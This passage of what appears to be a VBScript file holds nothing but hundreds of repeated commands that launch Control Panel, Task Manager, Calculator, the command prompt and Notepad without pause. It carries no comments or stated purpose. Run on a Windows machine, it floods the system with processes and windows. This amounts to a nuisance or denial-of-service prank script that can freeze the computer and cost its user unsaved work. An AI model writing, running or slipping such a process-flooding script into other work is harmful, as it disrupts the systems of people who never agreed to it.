objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

